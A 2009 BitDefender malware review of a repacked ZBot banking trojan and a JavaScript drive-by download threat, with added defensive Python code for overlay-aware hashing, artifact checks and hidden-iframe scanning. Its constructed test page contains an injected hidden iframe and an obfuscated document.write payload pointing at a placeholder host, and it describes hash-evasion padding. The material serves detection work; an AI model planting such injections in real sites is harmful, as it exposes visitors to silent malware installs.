
BitDefender weekly review – ZBot is still around

Date: 06/26/2009
Author: Andrei Bereczki

ZBot does not look like it will stop spreading any time soon. It hasn't been long since we last wrote about this e-threat, and here it is again, repacked and ready to roll out to the masses. Keep your guard up and your spam filters updated, or you might get hit.

Trojan.Spy.ZBot.UO

The malware uses a common trick on users: its icon is not the usual executable icon. In this case it carries a *.chm (Microsoft Compiled HTML Help) file icon; we have also seen ZBot samples using Microsoft Excel and standard folder icons.

As with most ZBot variants, its infection vector is e-mail spam.

This particular version of ZBot is nothing more than a repacked Trojan.Spy.ZBot.UI. It injects code into winlogon.exe, which lets it create files and connect to the Internet without being noticed. From there it drops a copy of itself as %windir%\system32\sdra64.exe, adding garbage to the executable so that the copy has a different size and MD5 hash than the original, a rather weak attempt at AV evasion. It also creates a folder named lowsec in the same directory, in which it writes three files of encrypted data: local.ds, user.ds and user.ds.lll.

To run at every system startup, the Trojan modifies certain registry entries. It also marks its presence on the machine by creating the mutex __SYSTEM__64AD0625__.
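Why the size-and-MD5 trick is weak, and how to triage a host for the artifacts named above, as an added example (this is not BitDefender's code or the sample's). It assumes the garbage is appended past the last PE section, i.e. as overlay data that the Windows loader never maps; the toy PE image it builds is constructed for the demonstration and is not a real binary, and the hypothetical repack_with_garbage() stands in for whatever the packer actually does. A hash over only the mapped headers and sections survives the padding, which is why a plain whole-file MD5 blacklist is the wrong tool here.

```python
"""Overlay-aware hashing of a PE file, plus a sweep for the on-disk
artifacts the write-up names. Added example, not BitDefender code."""
import hashlib
import os
import struct

# File artifacts from the write-up, relative to %windir%.
ZBOT_PATHS = [
    os.path.join("system32", "sdra64.exe"),
    os.path.join("system32", "lowsec", "local.ds"),
    os.path.join("system32", "lowsec", "user.ds"),
    os.path.join("system32", "lowsec", "user.ds.lll"),
]
ZBOT_MUTEX = "__SYSTEM__64AD0625__"


def pe_end_of_sections(data: bytes) -> int:
    """Return the file offset where the last raw section ends.
    Everything after it is overlay: bytes the loader never maps."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    opt_size, = struct.unpack_from("<H", data, coff + 16)
    sect_table = coff + 20 + opt_size         # first IMAGE_SECTION_HEADER
    end = sect_table + 40 * num_sections      # never less than the headers
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect_table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def hashes(data: bytes) -> dict:
    """Whole-file MD5 (what padding defeats) next to a hash of the mapped part."""
    core = data[:pe_end_of_sections(data)]
    return {
        "md5_file": hashlib.md5(data).hexdigest(),
        "md5_core": hashlib.md5(core).hexdigest(),
        "overlay_bytes": len(data) - len(core),
    }


def repack_with_garbage(data: bytes, garbage: bytes) -> bytes:
    """Hypothetical stand-in for the trick described: append junk so that
    size and whole-file MD5 change while the mapped image does not."""
    return data + garbage


def build_toy_pe(code: bytes) -> bytes:
    """Constructed minimal one-section PE image, only good for hashing tests."""
    opt_size = 224
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    raw_ptr, raw_size = 0x200, 0x200
    sect = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", len(code), 0x1000, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + b"\0" * opt_size + sect).ljust(raw_ptr, b"\0")
    return headers + code.ljust(raw_size, b"\0")


def zbot_artifacts(windir: str) -> list:
    """Which of the write-up's file artifacts exist under the given %windir%."""
    return [p for p in ZBOT_PATHS if os.path.exists(os.path.join(windir, p))]


def zbot_mutex_present() -> bool:
    """On Windows, try to open the named mutex; always False elsewhere."""
    if os.name != "nt":
        return False
    import ctypes
    k32 = ctypes.windll.kernel32
    handle = k32.OpenMutexW(0x00100000, False, ZBOT_MUTEX)   # SYNCHRONIZE
    if not handle:
        return False
    k32.CloseHandle(handle)
    return True


if __name__ == "__main__":
    original = build_toy_pe(b"\x55\x8b\xec\x33\xc0\x5d\xc3")
    repacked = repack_with_garbage(original, os.urandom(777))
    print("original:", hashes(original))
    print("repacked:", hashes(repacked))
    print("artifacts:", zbot_artifacts(os.environ.get("WINDIR", r"C:\Windows")))
    print("mutex:", zbot_mutex_present())
```

On a real sample the same idea extends to import hashes or per-section hashes; the point is to hash what the loader maps rather than the file as a whole.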


Trojan.JS.PYV

This generic BitDefender detection covers JavaScript that tries to exploit vulnerabilities in outdated browsers or in third-party browser plugins, such as ActiveX controls for PDF viewing, Flash playback and others.

The script's job is to load malicious pages from within either pages crafted specifically for this purpose or originally clean websites that have since been compromised and modified to act as the delivery medium.

The mechanics of the attack: JavaScript code is injected into the clean page, and it creates a special iframe that is invisible to the eye but loads another page behind the one the victim is currently viewing.

That other page will almost certainly contain several exploits for the plugins mentioned above, and whichever one succeeds downloads malware to the affected PC without the user's knowledge or consent. This is called a drive-by download; the payload depends on which page the JavaScript loaded into the clean site.
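What the injection looks like in the page source, and a simple scanner that flags it, as an added example (not BitDefender's code or the detection described above). The sample page below is constructed: the benign iframe, the zero-size hidden iframe and the document.write snippet that splits the string "iframe" to dodge naive matching are all illustrative, and the hostnames are placeholders. The scanner flags an iframe that is hidden by size or style, and a script body that writes or creates an iframe, after undoing the simple string-concatenation trick.

```python
"""Flag hidden iframes and iframe-writing scripts in HTML.
Added example, not BitDefender code; the sample page is constructed."""
import re
from html.parser import HTMLParser

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
SCRIPT_IFRAME = re.compile(r"(document\.write|createElement)\s*\(.*?iframe", re.I | re.S)
SPLIT_STRING = re.compile(r"['\"]\s*\+\s*['\"]")   # 'ifr'+'ame' -> iframe


def _is_tiny(value):
    """True for width/height values such as '0', '0px' or '1' that hide a frame."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


class IframeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []        # (kind, detail) tuples
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = a.get("style") or ""
            hidden = (_is_tiny(a.get("width")) or _is_tiny(a.get("height"))
                      or HIDDEN_STYLE.search(style) is not None)
            if hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []

    def handle_data(self, data):
        # html.parser hands us <script> bodies raw, so the markup inside
        # document.write('...') strings arrives here as text.
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = SPLIT_STRING.sub("", "".join(self._script_buf))
            if SCRIPT_IFRAME.search(body):
                self.findings.append(("script-writes-iframe", body.strip()[:60]))


def scan_html(html: str) -> list:
    """Return the list of (kind, detail) findings for a page."""
    parser = IframeScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: one legitimate embed, then the injected material.
SAMPLE_PAGE = """<html><body>
<h1>Legitimate page</h1>
<iframe src="https://example.org/widget" width="300" height="200"></iframe>
<!-- injected by the attacker: -->
<iframe src="http://bad.example/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write('<ifr'+'ame src="http://bad.example/x.php" width=1 height=1></ifr'+'ame>');</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind}: {detail}")
```

Real injections are usually further obfuscated (escaped strings, eval, unescape), so in practice this sits behind a JavaScript deobfuscation step; the size and style heuristics on the resulting DOM are the part that stays stable across campaigns.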

Information in this article is available courtesy of BitDefender virus researchers: Lutas Andrei Vlad and Marius Vanta
